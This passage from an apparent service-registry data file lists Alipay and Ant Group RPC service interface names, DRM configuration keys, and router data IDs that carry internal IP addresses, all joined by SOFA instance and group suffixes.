ame=com.alipay.tradeexprod.service.integration.drm.resource.SwitchExterfaceInvokeToUtpResource.subtradeRefundStrategy,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfsettleprod.facade.DailyBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.52.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.multichannel.MultiChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.RetailPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.trigger.spi.RiskCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.echox.service.EchoxDataManageService:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchmembercore.common.facade.MemberKaBaoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.autoThreeProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paycore.PmtDbkStyRuleCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.consultEventNotFillMsgRetryBlackStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.biz.shared.facade.CertTairCacheManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcaplatformunit.common.mobile.service.GreenFinanceMerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.core.service.card.MultiCardManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.InvestThreeMeetingProposalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.engine.cert.service.CaBizManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.RetailerManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.UcdpContentRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:linkw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.userHelpLevelMid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.finmarket.FinMarketServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.recordTitle,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.cicada.facade.api.VoucherActivityModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.defaultRecommendSubjectIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudnet.facade.callback.UniformCallbackFacade:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@mobileapp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.ptcore.common.service.facade.api.abossmigration.AbossMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.dataProperty.DataPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.message.ChatMessageManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.loadtest.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fundprod.common.service.facade.product.drm.FundProdConvertDrmConfig.crossTaConvertShutdownLine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbordersync.common.service.facade.spi.PayNotifyProcessCallback:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.newOperatorGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.masterdata.common.service.facade.MasterDataCZoneOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.chargeNewExterfaceSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.biz.service.prod.drm.ProdDrmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.101.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.common.service.facade.api.MerchantSubjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetcore.common.service.lmb.facade.LMBConsumeRebateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.core.service.emulator.dal.logsim.appreplayresult.OeEmulatorAppReplayResultDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.0.248.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceItemReceiverAddressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_batchProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryFxFundInstService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantRolePageQueryFacade:1.0:mifcz-merchantRolePageQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.journey.event.JourneyUserFlowDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.developertool.facade.resource.AdaptorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secdatacontext.common.facade.api.manage.DataNodeVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.common.service.facade.trade.settingendowment.SettingEndowmentRedeemCalendarChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.DispatchUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:agdsccalipay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkguarprod.service.facade.api.GuarProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.match.api.MatchProductAggrModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.antgroup.AgInvolvedPartyViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.CommonBizDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.loanApplyCloseList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_O_PAIDCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.monitor.ProjectQuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:nvwaCoinExchangeTransferProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.InspectObeliskSerialDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.49.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.constract.MockManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_onestop_monitorFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.BizProcessOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.171.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.bizmonlog.api.BizMonConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:decisioncenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyTransFacade:1.0:INNERTRANS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.creditPayQualificationCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.CardModelDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.luckydraw.facade.LuckyDrawTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.phone.PhoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.server.config.ServerConfigService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:yebquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vegameta.common.service.facade.event.EventMetaConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.virtualprod.common.service.facade.lottery.LotteryCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.core.engine.drm.KVTemplateStyleAndActionDrm.actionConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.grsettle.facade.api.sla.SlaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.autotest.DbRouteTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.PushAppCardService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.verification.VerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCLOANMARKET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.template.TemplateConditionGroupOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.IdolInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mayibank.bkprocecore.oyz.facade.single.quality.QualityLinkageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promohelix.common.service.facade.api.sci.TaskActionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.selfZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.org.InternalStaffFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizrecon.facade.NotifyCheckResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necbill.common.service.loan.OffsetBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.api.category.MsContentWebCategoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.financingtrans.FintransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscsalipay.common.service.facade.ruleconfig.AgdsClientConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.QuestionBrainFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchcommerce.fmcgcore.common.service.facade.registration.api.RegistrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.assistant.iot.ChatbotIotServiceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.license.MiniPidLicenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.onlinetest.common.service.facade.AccountPoolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorAnnaGeneralScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.littleapp.LittleAppComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mapi.facade.partner.PartnerFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fxwopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PUBLICCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.tuanyuan.TyOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettleXtsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatasync.common.service.facade.KpiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.MobileCodeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:charityasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.forbiddenPublishAnswer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bcm.common.service.facade.CertOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.ChargeOffFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.chips.api.ChiptransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.exterface.ExterfaceTemporaryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficintelbiz.common.service.facade.api.ServiceTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imatchfacade.api.IMatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.ThemeModuleDrmResource.contentNearQueryEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:dasbi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instsvcmarket.common.service.facade.SvcAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.ServiceSearchStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.processmng.common.service.plugin.facade.PluginJarService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.spi.AssetsProcessSpiFacade:1.0:shopAssetsProcessSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.config.NodeBatchOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.test.DiscountSchedulerTriggerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:yf_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.gather.common.facade.treenode.service.GatherTreeNodeOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SECURITYDATA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpaasweb.common.service.integration.socialcore.SocialCoreServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.cloudmonitor.service.facade.ChartDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.biz.service.drm.AmountTransferInternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.common.service.facade.test.SchedulerExecuterAutoTest:1.0:lockLmbMoneyFlowDaemonExecuterAutoTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:sytest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.cmd.CommandManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_PAYCOREPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.recordWallstreetCallbackUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fin.pdcore.common.service.facade.adapter.AdapterProdCalendarQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.diseaseChanceCurveJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_SQ_STABLE_CRoute#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:creditvisaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.wealthcard.WealthCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.uniform.core.simulator.SecuritySimulatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.MerchantSwitchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insrecon.api.InsReconApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantTodoItemQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.alarmcheck.AlarmEventAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.177.164.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.amberdata.admin.service.SystemParameterService:1.0:systemParameterService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.icifTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csconfig.service.facade.api.AppQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.expire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetWarehouseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.test.EventReceiverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.ApiresSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.trade.TradeMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.trafficintelbiz.common.service.facade.api.ServiceSubTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.voucherConcealDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.176.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcp_merchant_settle_timeout@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-11#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ufe.internal.facade.service.UfeRepositoryLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserBankCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ActionLogFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custcenter.bizservice.facade.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.McommentCommonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.corprisk.CorpSuspectRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gotone.common.service.SmsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.gateway.AsgTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.facade.trafficoperation.TrafficStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkdepbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_POINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifprocess.scheduler.BatchTaskProcessorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:js-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingMsgAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.32.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.BlessingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.core.service.ldc.router.LdcRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.165.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_OASISDEVELOP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.cmd.TransferCmdListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.org.RealStoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.68.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dataResourceAccessTask